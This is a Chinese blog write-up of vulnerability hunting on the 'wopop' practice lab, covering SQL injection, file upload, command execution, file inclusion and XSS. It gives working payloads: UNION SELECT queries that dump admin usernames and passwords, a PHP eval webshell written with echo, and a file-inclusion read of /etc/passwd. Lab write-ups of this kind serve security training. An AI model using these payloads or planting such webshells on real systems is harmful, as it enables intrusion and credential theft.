当前位置: 首页 > news >正文

wopop靶场漏洞挖掘练习

一、sql注入漏洞

1.在搜索框输入-1 union select 1,2,3#

可以看到页面有回显

2.查询数据库名

-1 union select 1,2,database()#

3.通过查询admin表的数据可以进行登录后台

-1 union select 1,2,group_concat(user_name,user_pass) from admin#

二、文件上传漏洞

1.登录后台最下面有一个上传文件

2.上传一句话木马

上传并访问一句话木马

3.使用蚁剑连接

三、命令执行漏洞

1.在shell输入框输入whoami页面会执行

2.尝试写入一句话木马

echo '<?php @eval($_POST[cmd]); ?>' > cc.php

3.访问cc.php

可以访问成功

四、文件包含漏洞

1.在关于界面可以看到url里使用file进行传参

尝试能不能访问其他文件

可以访问到/etc/passwd文件 说明存在文件包含漏洞

五、XSS漏洞

在登录页面的username处输入弹窗代码

发现可以出现弹窗 说明存在xss漏洞

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 解决:Module build failed (from ./node_modules/sass-loader/dist/cjs.js)问题
  • Go Playground 在线编程环境
  • Unity自带脚本之GameObject脚本
  • MariaDB基本知识汇总
  • 如何使用智能合约铸造 NFT —— 以 NftMarket 合约为例
  • 部署自己的对话大模型,使用Ollama + Qwen2 +FastGPT 实现
  • 机器学习中的数据详解:数据类型、划分、属性等
  • 蚂蚁数科,独行的170天和未来新征程
  • Python 线程池:并发编程的高效工具
  • 跟《经济学人》学英文:2024年09月07日这期 How fashion conquered television
  • 一文300字从0到1使用Postman轻松搞定文件上传测试!
  • 传承中华文脉·弘扬北疆文化“四季内蒙古演出季”区内外文艺院团交流演出活动即将启动
  • 基于SpringBoot的在线购物平台
  • VS2022中文字符输出为乱码的解决
  • Linux中的scp 如何使用
  • 【技术性】Search知识
  • Babel配置的不完全指南
  • CSS实用技巧
  • EOS是什么
  • JAVA SE 6 GC调优笔记
  • jQuery(一)
  • js面向对象
  • mongodb--安装和初步使用教程
  • mysql中InnoDB引擎中页的概念
  • Odoo domain写法及运用
  • Vultr 教程目录
  • 关于Java中分层中遇到的一些问题
  • 浅谈Golang中select的用法
  • ​力扣解法汇总946-验证栈序列
  • ​直流电和交流电有什么区别为什么这个时候又要变成直流电呢?交流转换到直流(整流器)直流变交流(逆变器)​
  • ​字​节​一​面​
  • # 透过事物看本质的能力怎么培养?
  • #{}和${}的区别?
  • #中国IT界的第一本漂流日记 传递IT正能量# 【分享得“IT漂友”勋章】
  • $GOPATH/go.mod exists but should not goland
  • (3)(3.2) MAVLink2数据包签名(安全)
  • (cljs/run-at (JSVM. :browser) 搭建刚好可用的开发环境!)
  • (Java)【深基9.例1】选举学生会
  • (七)glDrawArry绘制
  • (深度全面解析)ChatGPT的重大更新给创业者带来了哪些红利机会
  • (四)c52学习之旅-流水LED灯
  • (文章复现)基于主从博弈的售电商多元零售套餐设计与多级市场购电策略
  • (游戏设计草稿) 《外卖员模拟器》 (3D 科幻 角色扮演 开放世界 AI VR)
  • (转)创业家杂志:UCWEB天使第一步
  • (自用)仿写程序
  • .Mobi域名介绍
  • .NET Framework 3.5安装教程
  • .NET Framework杂记
  • .net 发送邮件
  • .NET3.5下用Lambda简化跨线程访问窗体控件,避免繁复的delegate,Invoke(转)
  • .netcore 6.0/7.0项目迁移至.netcore 8.0 注意事项
  • .net安装_还在用第三方安装.NET?Win10自带.NET3.5安装
  • .NET框架设计—常被忽视的C#设计技巧
  • .Net转Java自学之路—基础巩固篇十三(集合)
  • /etc/shadow字段详解